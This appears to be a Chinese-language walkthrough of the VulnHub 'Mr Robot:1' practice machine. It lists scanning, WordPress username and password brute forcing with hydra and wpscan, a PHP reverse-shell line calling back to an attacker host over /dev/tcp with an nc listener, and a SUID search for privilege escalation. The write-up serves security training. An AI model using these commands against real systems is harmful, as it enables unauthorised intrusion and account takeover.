vulnhub Mr Robot:1


开局一手netdiscover和nmap
1.png

gobuster扫出来的robots和wp

1
gobuster dir -u http://192.168.0.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

2.png

还拿到了第一个key
one-key.png

fsocity=社会
dir=directory=字典
社会工程学字典。感觉是爆破用的
3.png

sort搭配uniq给字典排序and去重
4.png

hydra扫描用户

1
hydra -t 64 -L fsocity-sort.dic -p test 192.168.0.101 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:Invalid username"

5.png

wpscan爆破密码

1
wpscan --url http://192.168.0.101/ --api-token xxxx --usernames Elliot --passwords fsocity-sort.dic

6.png

反弹shell

1
2
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.105/1234 0>&1'");?>             //写弹shell语句
nc -lnvp 1234 //接受反弹shell

7.png

拿到第二个key
two-key.png

md5破解密码and loginMD5破解
8.png

nmap提权

1
find / -perm -u=s -type f 2>/dev/null

9.png

第三个key
three-key.png

其他参考:
1.
https://nwrzd.medium.com/vulnhub-com-mr-robot-1-walkthrough-5119586b2a3f

2.
https://medium.com/@D00MFist/vulnhub-mr-robot-220348146b3b

3.
https://hive.blog/security/@falconspy/mr-robot-vulnhub-walkthrough

4.
https://alpinesecurity.com/blog/mr-robot-walkthrough-vulnhub/

5.
https://www.infosecarticles.com/mr-robot-ctf-1-walkthrough/